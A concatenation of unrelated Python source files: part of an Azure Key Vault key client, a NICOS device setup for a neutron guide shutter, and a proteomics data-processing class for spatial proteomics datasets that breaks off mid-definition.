response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
purge_deleted_key.metadata = {'url': '/deletedkeys/{key-name}'} # type: ignore
@distributed_trace
def recover_deleted_key(
self,
vault_base_url, # type: str
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""Recovers the deleted key to its latest version.
The Recover Deleted Key operation is applicable for deleted keys in soft-delete enabled vaults.
It recovers the deleted key back to its latest version under /keys. An attempt to recover an
non-deleted key will return an error. Consider this the inverse of the delete operation on
soft-delete enabled vaults. This operation requires the keys/recover permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the deleted key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_recover_deleted_key_request(
key_name=key_name,
api_version=api_version,
template_url=self.recover_deleted_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
recover_deleted_key.metadata = {'url': '/deletedkeys/{key-name}/recover'} # type: ignore
|
py | 1a4fb1b9d94074be7c113191ca167e09d8fa24fe | description = 'FRM II neutron guide line 2b shutter'
group = 'lowlevel'
includes = ['guidehall']
tango_base = 'tango://ictrlfs.ictrl.frm2:10000/mlz/'
devices = dict(
NL2b = device('nicos.devices.tango.NamedDigitalInput',
description = 'NL2b shutter status',
mapping = {'closed': 0,
'open': 1},
pollinterval = 60,
maxage = 120,
tangodevice = tango_base + 'shutter/nl2b',
),
)
|
py | 1a4fb27801b1e966c597f4aba1a5841a2ba53c3c | import natsort
import numpy as np
import pandas as pd
import plotly.io as pio
import plotly.express as px
import plotly.graph_objects as go
import plotly.figure_factory as ff
import re
import traceback
from io import BytesIO
from sklearn.decomposition import PCA
from sklearn.metrics import pairwise as pw
import json
import statistics
import matplotlib.pyplot as plt
import matplotlib_venn as venn
from matplotlib_venn import venn2, venn3, venn3_circles
from PIL import Image
from upsetplot import from_memberships
from upsetplot import plot as upplot
import pkg_resources
def natsort_index_keys(x):
order = natsort.natsorted(np.unique(x.values))
return pd.Index([order.index(el) for el in x], name=x.name)
def natsort_list_keys(x):
order = natsort.natsorted(np.unique(x))
return [order.index(el) for el in x]
class SpatialDataSet:
regex = {
"imported_columns": "^[Rr]atio H/L (?!normalized|type|is.*|variability|count)[^ ]+|^Ratio H/L variability.... .+|^Ratio H/L count .+|id$|[Mm][Ss].*[cC]ount.+$|[Ll][Ff][Qq].*|.*[nN]ames.*|.*[Pp][rR]otein.[Ii][Dd]s.*|[Pp]otential.[cC]ontaminant|[Oo]nly.[iI]dentified.[bB]y.[sS]ite|[Rr]everse|[Ss]core|[Qq]-[Vv]alue|R.Condition|PG.Genes|PG.ProteinGroups|PG.Cscore|PG.Qvalue|PG.RunEvidenceCount|PG.Quantity|^Proteins$|^Sequence$"
}
acquisition_set_dict = {
"LFQ6 - Spectronaut" : ["LFQ intensity", "MS/MS count"],
"LFQ5 - Spectronaut" : ["LFQ intensity", "MS/MS count"],
"LFQ5 - MQ" : ["[Ll][Ff][Qq].[Ii]ntensity", "[Mm][Ss]/[Mm][Ss].[cC]ount", "[Ii]ntensity"],
"LFQ6 - MQ" : ["[Ll][Ff][Qq].[Ii]ntensity", "[Mm][Ss]/[Mm][Ss].[cC]ount", "[Ii]ntensity"],
"SILAC - MQ" : [ "[Rr]atio.[Hh]/[Ll](?!.[Vv]aria|.[Cc]ount)","[Rr]atio.[Hh]/[Ll].[Vv]ariability.\[%\]", "[Rr]atio.[Hh]/[Ll].[cC]ount"],
"Custom": ["(?!Protein IDs|Gene names)"]
}
Spectronaut_columnRenaming = {
"R.Condition": "Map", "PG.Genes" : "Gene names", "PG.Qvalue": "Q-value", "PG.Cscore":"C-Score",
"PG.ProteinGroups" : "Protein IDs", "PG.RunEvidenceCount" : "MS/MS count", "PG.Quantity" : "LFQ intensity"
}
css_color = ["#b2df8a", "#6a3d9a", "#e31a1c", "#b15928", "#fdbf6f", "#ff7f00", "#cab2d6", "#fb9a99", "#1f78b4", "#ffff99", "#a6cee3",
"#33a02c", "blue", "orange", "goldenrod", "lightcoral", "magenta", "brown", "lightpink", "red", "turquoise",
"khaki", "darkgoldenrod","darkturquoise", "darkviolet", "greenyellow", "darksalmon", "hotpink", "indianred", "indigo","darkolivegreen",
"coral", "aqua", "beige", "bisque", "black", "blanchedalmond", "blueviolet", "burlywood", "cadetblue", "yellowgreen", "chartreuse",
"chocolate", "cornflowerblue", "cornsilk", "darkblue", "darkcyan", "darkgray", "darkgrey", "darkgreen", "darkkhaki", "darkmagenta",
"darkorange", "darkorchid", "darkred", "darkseagreen", "darkslateblue", "snow", "springgreen", "darkslategrey", "mediumpurple", "oldlace",
"olive", "lightseagreen", "deeppink", "deepskyblue", "dimgray", "dimgrey", "dodgerblue", "firebrick", "floralwhite", "forestgreen",
"fuchsia", "gainsboro", "ghostwhite", "gold", "gray", "ivory", "lavenderblush", "lawngreen", "lemonchiffon", "lightblue", "lightcyan",
"fuchsia", "gainsboro", "ghostwhite", "gold", "gray", "ivory", "lavenderblush", "lawngreen", "lemonchiffon", "lightblue", "lightcyan",
"lightgoldenrodyellow", "lightgray", "lightgrey", "lightgreen", "lightsalmon", "lightskyblue", "lightslategray", "lightslategrey",
"lightsteelblue", "lightyellow", "lime", "limegreen", "linen", "maroon", "mediumaquamarine", "mediumblue", "mediumseagreen",
"mediumslateblue", "mediumspringgreen", "mediumturquoise", "mediumvioletred", "midnightblue", "mintcream", "mistyrose", "moccasin",
"olivedrab", "orangered", "orchid", "palegoldenrod", "palegreen", "paleturquoise", "palevioletred", "papayawhip", "peachpuff", "peru",
"pink", "plum", "powderblue", "rosybrown", "royalblue", "saddlebrown", "salmon", "sandybrown", "seagreen", "seashell", "sienna", "silver",
"skyblue", "slateblue", "steelblue", "teal", "thistle", "tomato", "violet", "wheat", "white", "whitesmoke", "slategray", "slategrey",
"aquamarine", "azure","crimson", "cyan", "darkslategray", "grey","mediumorchid","navajowhite", "navy"]
analysed_datasets_dict = {}
df_organellarMarkerSet = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/organellemarkers/{}.csv'.format("Homo sapiens - Uniprot")),
usecols=lambda x: bool(re.match("Gene name|Compartment", x)))
df_organellarMarkerSet = df_organellarMarkerSet.rename(columns={"Gene name":"Gene names"})
df_organellarMarkerSet = df_organellarMarkerSet.astype({"Gene names": "str"})
def __init__(self, filename, expname, acquisition, comment, name_pattern="e.g.:.* (?P<cond>.*)_(?P<rep>.*)_(?P<frac>.*)", reannotate_genes=False, **kwargs):
self.filename = filename
self.expname = expname
self.acquisition = acquisition
self.name_pattern = name_pattern
self.comment = comment
self.imported_columns = self.regex["imported_columns"]
self.fractions, self.map_names = [], []
self.df_01_stacked, self.df_log_stacked = pd.DataFrame(), pd.DataFrame()
if acquisition == "SILAC - MQ":
if "RatioHLcount" not in kwargs.keys():
self.RatioHLcount = 2
else:
self.RatioHLcount = kwargs["RatioHLcount"]
del kwargs["RatioHLcount"]
if "RatioVariability" not in kwargs.keys():
self.RatioVariability = 30
else:
self.RatioVariability = kwargs["RatioVariability"]
del kwargs["RatioVariability"]
elif acquisition == "Custom":
self.custom_columns = kwargs["custom_columns"]
self.custom_normalized = kwargs["custom_normalized"]
self.imported_columns = "^"+"$|^".join(["$|^".join(el) if type(el) == list else el for el in self.custom_columns.values() if el not in [[], None, ""]])+"$"
#elif acquisition == "LFQ5 - MQ" or acquisition == "LFQ6 - MQ" or acquisition == "LFQ6 - Spectronaut" or acquisition == "LFQ5 - Spectronaut":
else:
if "summed_MSMS_counts" not in kwargs.keys():
self.summed_MSMS_counts = 2
else:
self.summed_MSMS_counts = kwargs["summed_MSMS_counts"]
del kwargs["summed_MSMS_counts"]
if "consecutiveLFQi" not in kwargs.keys():
self.consecutiveLFQi = 4
else:
self.consecutiveLFQi = kwargs["consecutiveLFQi"]
del kwargs["consecutiveLFQi"]
#self.markerset_or_cluster = False if "markerset_or_cluster" not in kwargs.keys() else kwargs["markerset_or_cluster"]
if "organism" not in kwargs.keys():
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format("Homo sapiens - Uniprot")))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
else:
assert kwargs["organism"]+".csv" in pkg_resources.resource_listdir(__name__, "annotations/complexes")
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format(kwargs["organism"])))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
self.organism = kwargs["organism"]
del kwargs["organism"]
self.analysed_datasets_dict = {}
self.analysis_summary_dict = {}
def data_reading(self, filename=None, content=None):
"""
Data import. Can read the df_original from a file or buffer.
df_original contains all information of the raw file; tab separated file is imported,
Args:
self:
filename: string
imported_columns : dictionry; columns that correspond to this regular expression will be imported
filename: default None, to use the class attribute. Otherwise overwrites the class attribute upon success.
content: default None, to use the filename. Any valid input to pd.read_csv can be provided, e.g. a StringIO buffer.
Returns:
self.df_orginal: raw, unprocessed dataframe, single level column index
"""
# use instance attribute if no filename is provided
if filename is None:
filename = self.filename
# if no buffer is provided for the content read straight from the file
if content is None:
content = filename
if filename.endswith("xls") or filename.endswith("txt"):
self.df_original = pd.read_csv(content, sep="\t", comment="#", usecols=lambda x: bool(re.match(self.imported_columns, x)), low_memory = True)
else: #assuming csv file
self.df_original = pd.read_csv(content, sep=",", comment="#", usecols=lambda x: bool(re.match(self.imported_columns, x)), low_memory = True)
assert self.df_original.shape[0]>10 and self.df_original.shape[1]>5
self.filename = filename
return self.df_original
def processingdf(self, name_pattern=None, summed_MSMS_counts=None, consecutiveLFQi=None, RatioHLcount=None, RatioVariability=None, custom_columns=None, custom_normalized=None):
"""
Analysis of the SILAC/LFQ-MQ/LFQ-Spectronaut data will be performed. The dataframe will be filtered, normalized, and converted into a dataframe,
characterized by a flat column index. These tasks is performed by following functions:
indexingdf(df_original, acquisition_set_dict, acquisition, fraction_dict, name_pattern)
spectronaut_LFQ_indexingdf(df_original, Spectronaut_columnRenaming, acquisition_set_dict, acquisition, fraction_dict, name_pattern)
stringency_silac(df_index)
normalization_01_silac(df_stringency_mapfracstacked):
logarithmization_silac(df_stringency_mapfracstacked):
stringency_lfq(df_index):
normalization_01_lfq(df_stringency_mapfracstacked):
logarithmization_lfq(df_stringency_mapfracstacked):
Args:
self.acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
additional arguments can be used to override the value set by the class init function
Returns:
self:
map_names: list of Map names
df_01_stacked: df; 0-1 normalized data with "normalized profile" as column name
df_log_stacked: df; log transformed data
analysis_summary_dict["0/1 normalized data - mean"] : 0/1 normalized data across all maps by calculating the mean
["changes in shape after filtering"]
["Unique Proteins"] : unique proteins, derived from the first entry of Protein IDs, seperated by a ";"
["Analysis parameters"] : {"acquisition" : ...,
"filename" : ...,
#SILAC#
"Ratio H/L count 1 (>=X)" : ...,
"Ratio H/L count 2 (>=Y, var<Z)" : ...,
"Ratio variability (<Z, count>=Y)" : ...
#LFQ#
"consecutive data points" : ...,
"summed MS/MS counts" : ...
}
"""
if name_pattern is None:
name_pattern = self.name_pattern
if self.acquisition == "SILAC - MQ":
if RatioHLcount is None:
RatioHLcount = self.RatioHLcount
if RatioVariability is None:
RatioVariability = self.RatioVariability
elif self.acquisition == "Custom":
if custom_columns is None:
custom_columns = self.custom_columns
if custom_normalized is None:
custom_normalized = self.custom_normalized
else:
if summed_MSMS_counts is None:
summed_MSMS_counts = self.summed_MSMS_counts
if consecutiveLFQi is None:
consecutiveLFQi = self.consecutiveLFQi
shape_dict = {}
def indexingdf():
"""
For data output from MaxQuant, all columns - except of "MS/MS count" and "LFQ intensity" (LFQ) | "Ratio H/L count", "Ratio H/L variability [%]"
(SILAC) - will be set as index. A multiindex will be generated, containing "Set" ("MS/MS count", "LFQ intensity"| "Ratio H/L count", "Ratio H/L
variability [%]"), "Fraction" (= defined via "name_pattern") and "Map" (= defined via "name_pattern") as level names, allowing the stacking and
unstacking of the dataframe. The dataframe will be filtered by removing matches to the reverse database, matches only identified by site, and
potential contaminants.
Args:
self:
df_original: dataframe, columns defined through self.imported_columns
acquisition_set_dict: dictionary, all columns will be set as index, except of those that are listed in acquisition_set_dict
acquisition: string, one of "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
fraction_dict: "Fraction" is part of the multiindex; fraction_dict allows the renaming of the fractions e.g. 3K -> 03K
name_pattern: regular expression, to identify Map-Fraction-(Replicate)
Returns:
self:
df_index: mutliindex dataframe, which contains 3 level labels: Map, Fraction, Type
shape_dict["Original size"] of df_original
shape_dict["Shape after categorical filtering"] of df_index
fractions: list of fractions e.g. ["01K", "03K", ...]
"""
df_original = self.df_original.copy()
df_original.rename({"Proteins": "Protein IDs"}, axis=1, inplace=True)
df_original = df_original.set_index([col for col in df_original.columns
if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]]) == False])
# multindex will be generated, by extracting the information about the Map, Fraction and Type from each individual column name
multiindex = pd.MultiIndex.from_arrays(
arrays=[
[[re.findall(s, col)[0] for s in self.acquisition_set_dict[self.acquisition] if re.match(s,col)][0]
for col in df_original.columns],
[re.match(self.name_pattern, col).group("rep") for col in df_original.columns] if not "<cond>" in self.name_pattern
else ["_".join(re.match(self.name_pattern, col).group("cond", "rep")) for col in df_original.columns],
[re.match(self.name_pattern, col).group("frac") for col in df_original.columns],
],
names=["Set", "Map", "Fraction"]
)
df_original.columns = multiindex
df_original.sort_index(1, inplace=True)
shape_dict["Original size"] = df_original.shape
try:
df_index = df_original.xs(
np.nan, 0, "Reverse")
except:
pass
try:
df_index = df_index.xs(
np.nan, 0, "Potential contaminant")
except:
pass
try:
df_index = df_index.xs(
np.nan, 0, "Only identified by site")
except:
pass
df_index.replace(0, np.nan, inplace=True)
shape_dict["Shape after categorical filtering"] = df_index.shape
df_index.rename(columns={"MS/MS Count":"MS/MS count"}, inplace=True)
fraction_wCyt = list(df_index.columns.get_level_values("Fraction").unique())
##############Cyt should get only be removed if it is not an NMC split
if "Cyt" in fraction_wCyt and len(fraction_wCyt) >= 4:
df_index.drop("Cyt", axis=1, level="Fraction", inplace=True)
try:
if self.acquisition == "LFQ5 - MQ":
df_index.drop("01K", axis=1, level="Fraction", inplace=True)
except:
pass
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def custom_indexing_and_normalization():
df_original = self.df_original.copy()
df_original.rename({custom_columns["ids"]: "Protein IDs", custom_columns["genes"]: "Gene names"}, axis=1, inplace=True)
df_original = df_original.set_index([col for col in df_original.columns
if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]]) == False])
# multindex will be generated, by extracting the information about the Map, Fraction and Type from each individual column name
multiindex = pd.MultiIndex.from_arrays(
arrays=[
["normalized profile" for col in df_original.columns],
[re.match(self.name_pattern, col).group("rep") for col in df_original.columns] if not "<cond>" in self.name_pattern
else ["_".join(re.match(self.name_pattern, col).group("cond", "rep")) for col in df_original.columns],
[re.match(self.name_pattern, col).group("frac") for col in df_original.columns],
],
names=["Set", "Map", "Fraction"]
)
df_original.columns = multiindex
df_original.sort_index(1, inplace=True)
shape_dict["Original size"] = df_original.shape
# for custom upload assume full normalization for now. this should be extended to valid value filtering and 0-1 normalization later
df_index = df_original.copy()
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def spectronaut_LFQ_indexingdf():
"""
For data generated from the Spectronaut software, columns will be renamed, such it fits in the scheme of MaxQuant output data. Subsequently, all
columns - except of "MS/MS count" and "LFQ intensity" will be set as index. A multiindex will be generated, containing "Set" ("MS/MS count" and
"LFQ intensity"), Fraction" and "Map" (= defined via "name_pattern"; both based on the column name R.condition - equivalent to the column name "Map"
in df_renamed["Map"]) as level labels.
!!!
!!!It is very important to define R.Fraction, R.condition already during the setup of Spectronaut!!!
!!!
Args:
self:
df_original: dataframe, columns defined through self.imported_columns
Spectronaut_columnRenaming
acquisition_set_dict: dictionary, all columns will be set as index, except of those that are listed in acquisition_set_dict
acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut"
fraction_dict: "Fraction" is part of the multiindex; fraction_dict allows the renaming of the fractions e.g. 3K -> 03K
name_pattern: regular expression, to identify Map-Fraction-(Replicate)
Returns:
self:
df_index: mutliindex dataframe, which contains 3 level labels: Map, Fraction, Type
shape_dict["Original size"] of df_index
fractions: list of fractions e.g. ["01K", "03K", ...]
"""
df_original = self.df_original.copy()
df_renamed = df_original.rename(columns=self.Spectronaut_columnRenaming)
df_renamed["Fraction"] = [re.match(self.name_pattern, i).group("frac") for i in df_renamed["Map"]]
df_renamed["Map"] = [re.match(self.name_pattern, i).group("rep") for i in df_renamed["Map"]] if not "<cond>" in self.name_pattern else ["_".join(
re.match(self.name_pattern, i).group("cond", "rep")) for i in df_renamed["Map"]]
df_index = df_renamed.set_index([col for col in df_renamed.columns if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]])==False])
df_index.columns.names = ["Set"]
# In case fractionated data was used this needs to be catched and aggregated
try:
df_index = df_index.unstack(["Map", "Fraction"])
except ValueError:
df_index = df_index.groupby(by=df_index.index.names).agg(np.nansum, axis=0)
df_index = df_index.unstack(["Map", "Fraction"])
df_index.replace(0, np.nan, inplace=True)
shape_dict["Original size"]=df_index.shape
fraction_wCyt = list(df_index.columns.get_level_values("Fraction").unique())
#Cyt is removed only if it is not an NMC split
if "Cyt" in fraction_wCyt and len(fraction_wCyt) >= 4:
df_index.drop("Cyt", axis=1, level="Fraction", inplace=True)
try:
if self.acquisition == "LFQ5 - Spectronaut":
df_index.drop("01K", axis=1, level="Fraction", inplace=True)
except:
pass
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def stringency_silac(df_index):
"""
The multiindex dataframe is subjected to stringency filtering. Only Proteins with complete profiles are considered (a set of f.e. 5 SILAC ratios
in case you have 5 fractions / any proteins with missing values were rejected). Proteins were retained with 3 or more quantifications in each
subfraction (=count). Furthermore, proteins with only 2 quantification events in one or more subfraction were retained, if their ratio variability for
ratios obtained with 2 quantification events was below 30% (=var). SILAC ratios were linearly normalized by division through the fraction median.
Subsequently normalization to SILAC loading was performed.Data is annotated based on specified marker set e.g. eLife.
Args:
df_index: multiindex dataframe, which contains 3 level labels: MAP, Fraction, Type
RatioHLcount: int, 2
RatioVariability: int, 30
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
fractions: list of fractions e.g. ["01K", "03K", ...]
Returns:
df_stringency_mapfracstacked: dataframe, in which "MAP" and "Fraction" are stacked;
columns "Ratio H/L count", "Ratio H/L variability [%]", and "Ratio H/L" stored as single level indices
shape_dict["Shape after Ratio H/L count (>=3)/var (count>=2, var<30) filtering"] of df_countvarfiltered_stacked
shape_dict["Shape after filtering for complete profiles"] of df_stringency_mapfracstacked
"""
# Fraction and Map will be stacked
df_stack = df_index.stack(["Fraction", "Map"])
# filtering for sufficient number of quantifications (count in "Ratio H/L count"), taken variability (var in Ratio H/L variability [%]) into account
# zip: allows direct comparison of count and var
# only if the filtering parameters are fulfilled the data will be introduced into df_countvarfiltered_stacked
#default setting: RatioHLcount = 2 ; RatioVariability = 30
df_countvarfiltered_stacked = df_stack.loc[[count>RatioHLcount or (count==RatioHLcount and var<RatioVariability)
for var, count in zip(df_stack["Ratio H/L variability [%]"], df_stack["Ratio H/L count"])]]
shape_dict["Shape after Ratio H/L count (>=3)/var (count==2, var<30) filtering"] = df_countvarfiltered_stacked.unstack(["Fraction", "Map"]).shape
# "Ratio H/L":normalization to SILAC loading, each individual experiment (FractionXMap) will be divided by its median
# np.median([...]): only entries, that are not NANs are considered
df_normsilac_stacked = df_countvarfiltered_stacked["Ratio H/L"]\
.unstack(["Fraction", "Map"])\
.apply(lambda x: x/np.nanmedian(x), axis=0)\
.stack(["Map", "Fraction"])
df_stringency_mapfracstacked = df_countvarfiltered_stacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(
pd.DataFrame(df_normsilac_stacked, columns=["Ratio H/L"]))
# dataframe is grouped (Map, id), that allows the filtering for complete profiles
df_stringency_mapfracstacked = df_stringency_mapfracstacked.groupby(["Map", "id"]).filter(lambda x: len(x)>=len(self.fractions))
shape_dict["Shape after filtering for complete profiles"]=df_stringency_mapfracstacked.unstack(["Fraction", "Map"]).shape
# Ratio H/L is converted into Ratio L/H
df_stringency_mapfracstacked["Ratio H/L"] = df_stringency_mapfracstacked["Ratio H/L"].transform(lambda x: 1/x)
#Annotation with marker genes
df_organellarMarkerSet = self.df_organellarMarkerSet
df_stringency_mapfracstacked.reset_index(inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.merge(df_organellarMarkerSet, how="left", on="Gene names")
df_stringency_mapfracstacked.set_index([c for c in df_stringency_mapfracstacked.columns
if c not in ["Ratio H/L count","Ratio H/L variability [%]","Ratio H/L"]], inplace=True)
df_stringency_mapfracstacked.rename(index={np.nan:"undefined"}, level="Compartment", inplace=True)
return df_stringency_mapfracstacked
def normalization_01_silac(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is 0-1 normalized ("Ratio H/L").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" are stacked;
columns "Ratio H/L count", "Ratio H/L variability [%]", and "Ratio H/L" stored as single level indices
self:
fractions: list of fractions e.g. ["01K", "03K", ...]
data_completeness: series, for each individual map, as well as combined maps: 1 - (percentage of NANs)
Returns:
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "Ratio H/L" is 0-1 normalized and renamed to "normalized
profile"; the columns "Ratio H/L count", "Ratio H/L variability [%]", and "normalized profile" stored as single level indices;
plotting is possible now
self:
analysis_summary_dict["Data/Profile Completeness"] : df, with information about Data/Profile Completeness
column: "Experiment", "Map", "Data completeness", "Profile completeness"
no row index
"""
df_01norm_unstacked = df_stringency_mapfracstacked["Ratio H/L"].unstack("Fraction")
# 0:1 normalization of Ratio L/H
df_01norm_unstacked = df_01norm_unstacked.div(df_01norm_unstacked.sum(axis=1), axis=0)
df_01_stacked = df_stringency_mapfracstacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(pd.DataFrame
(df_01norm_unstacked.stack("Fraction"),columns=["Ratio H/L"]))
# "Ratio H/L" will be renamed to "normalized profile"
df_01_stacked.columns = [col if col!="Ratio H/L" else "normalized profile" for col in df_01_stacked.columns]
return df_01_stacked
def logarithmization_silac(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is logarithmized ("Ratio H/L").
Args:
df_stringency_mapfracstacked: dataframe, in which "MAP" and "Fraction" are stacked; the columns "Ratio H/L count", "Ratio H/L variability [%]",
and "Ratio H/L" stored as single level indices
Returns:
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized "Ratio H/L"
data; the columns "Ratio H/L count", "Ratio H/L variability [%]" and "log profile" are stored as single level indices;
PCA is possible now
"""
# logarithmizing, basis of 2
df_lognorm_ratio_stacked = df_stringency_mapfracstacked["Ratio H/L"].transform(np.log2)
df_log_stacked = df_stringency_mapfracstacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(
pd.DataFrame(df_lognorm_ratio_stacked, columns=["Ratio H/L"]))
# "Ratio H/L" will be renamed to "log profile"
df_log_stacked.columns = [col if col !="Ratio H/L" else "log profile" for col in df_log_stacked.columns]
return df_log_stacked
def stringency_lfq(df_index):
"""
The multiindex dataframe is subjected to stringency filtering. Only Proteins which were identified with
at least [4] consecutive data points regarding the "LFQ intensity", and if summed MS/MS counts >= n(fractions)*[2]
(LFQ5: min 10 and LFQ6: min 12, respectively; coverage filtering) were included.
Data is annotated based on specified marker set e.g. eLife.
Args:
df_index: multiindex dataframe, which contains 3 level labels: MAP, Fraction, Typ
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
fractions: list of fractions e.g. ["01K", "03K", ...]
summed_MSMS_counts: int, 2
consecutiveLFQi: int, 4
Returns:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked; "LFQ intensity" and "MS/MS count" define a
single-level column index
self:
shape_dict["Shape after MS/MS value filtering"] of df_mscount_mapstacked
shape_dict["Shape after consecutive value filtering"] of df_stringency_mapfracstacked
"""
df_index = df_index.stack("Map")
# sorting the level 0, in order to have LFQ intensity - MS/MS count instead of continuous alternation
df_index.sort_index(axis=1, level=0, inplace=True)
# "MS/MS count"-column: take the sum over the fractions; if the sum is larger than n[fraction]*2, it will be stored in the new dataframe
minms = (len(self.fractions) * self.summed_MSMS_counts)
if minms > 0:
df_mscount_mapstacked = df_index.loc[df_index[("MS/MS count")].apply(np.sum, axis=1) >= minms]
shape_dict["Shape after MS/MS value filtering"]=df_mscount_mapstacked.unstack("Map").shape
df_stringency_mapfracstacked = df_mscount_mapstacked.copy()
else:
df_stringency_mapfracstacked = df_index.copy()
# series no dataframe is generated; if there are at least i.e. 4 consecutive non-NANs, data will be retained
df_stringency_mapfracstacked.sort_index(level="Fraction", axis=1, key=natsort_index_keys, inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.loc[
df_stringency_mapfracstacked[("LFQ intensity")]\
.apply(lambda x: np.isfinite(x), axis=0)\
.apply(lambda x: sum(x) >= self.consecutiveLFQi and any(x.rolling(window=self.consecutiveLFQi).sum() >= self.consecutiveLFQi), axis=1)]
shape_dict["Shape after consecutive value filtering"]=df_stringency_mapfracstacked.unstack("Map").shape
df_stringency_mapfracstacked = df_stringency_mapfracstacked.copy().stack("Fraction")
#Annotation with marker genes
df_organellarMarkerSet = self.df_organellarMarkerSet
df_stringency_mapfracstacked.reset_index(inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.merge(df_organellarMarkerSet, how="left", on="Gene names")
df_stringency_mapfracstacked.set_index([c for c in df_stringency_mapfracstacked.columns
if c!="MS/MS count" and c!="LFQ intensity"], inplace=True)
df_stringency_mapfracstacked.rename(index={np.nan : "undefined"}, level="Compartment", inplace=True)
return df_stringency_mapfracstacked
def normalization_01_lfq(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is 0-1 normalized ("LFQ intensity").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked, "LFQ intensity" and "MS/MS count" define a
single-level column index
self:
fractions: list of fractions e.g. ["01K", "03K", ...]
Returns:
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "LFQ intensity" is 0-1 normalized and renamed to
"normalized profile"; the columns "normalized profile" and "MS/MS count" are stored as single level indices; plotting is possible now
"""
df_01norm_mapstacked = df_stringency_mapfracstacked["LFQ intensity"].unstack("Fraction")
# 0:1 normalization of Ratio L/H
df_01norm_unstacked = df_01norm_mapstacked.div(df_01norm_mapstacked.sum(axis=1), axis=0)
df_rest = df_stringency_mapfracstacked.drop("LFQ intensity", axis=1)
df_01_stacked = df_rest.join(pd.DataFrame(df_01norm_unstacked.stack(
"Fraction"),columns=["LFQ intensity"]))
# rename columns: "LFQ intensity" into "normalized profile"
df_01_stacked.columns = [col if col!="LFQ intensity" else "normalized profile" for col in
df_01_stacked.columns]
#imputation
df_01_stacked = df_01_stacked.unstack("Fraction").replace(np.NaN, 0).stack("Fraction")
df_01_stacked = df_01_stacked.sort_index()
return df_01_stacked
def logarithmization_lfq(df_stringency_mapfracstacked):
"""The multiindex dataframe, that was subjected to stringency filtering, is logarithmized ("LFQ intensity").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked; "LFQ intensity" and "MS/MS count" define a
single-level column index
Returns:
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized
"LFQ intensity"; the columns "log profile" and "MS/MS count" are stored as single level indices; PCA is possible now
"""
df_lognorm_ratio_stacked = df_stringency_mapfracstacked["LFQ intensity"].transform(np.log2)
df_rest = df_stringency_mapfracstacked.drop("LFQ intensity", axis=1)
df_log_stacked = df_rest.join(pd.DataFrame(df_lognorm_ratio_stacked, columns=["LFQ intensity"]))
# "LFQ intensity" will be renamed to "log profile"
df_log_stacked.columns = [col if col!="LFQ intensity" else "log profile" for col in df_log_stacked.columns]
return df_log_stacked
def split_ids_uniprot(el):
"""
